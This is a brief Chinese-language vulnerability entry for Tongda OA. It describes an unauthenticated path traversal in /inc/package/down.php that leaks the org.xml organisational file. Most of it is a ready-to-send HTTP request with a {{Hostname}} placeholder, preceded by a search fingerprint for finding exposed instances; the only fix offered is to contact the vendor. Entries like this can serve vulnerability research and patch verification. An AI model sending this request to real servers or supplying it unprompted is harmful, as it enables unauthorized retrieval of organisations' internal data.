1 产品简介
通达OA(Office Anywhere网络智能办公系统)是由通达信科科技自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。
2 漏洞描述
通达OA(Office Anywhere网络智能办公系统)存在inc/package/down.php接口未授权漏洞。攻击者可以通过构造/inc/package/down.php?id=…/…/…/cache/org可以下载org.xml文件,获取敏感信息。
3 产品主页
body=“通达OA”
4 漏洞复现
GET /inc/package/down.php?id=../../../cache/org HTTP/1.1
Host: {{Hostname}}
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
导致敏感信息泄露
5 修复建议
建议联系软件厂商进行处理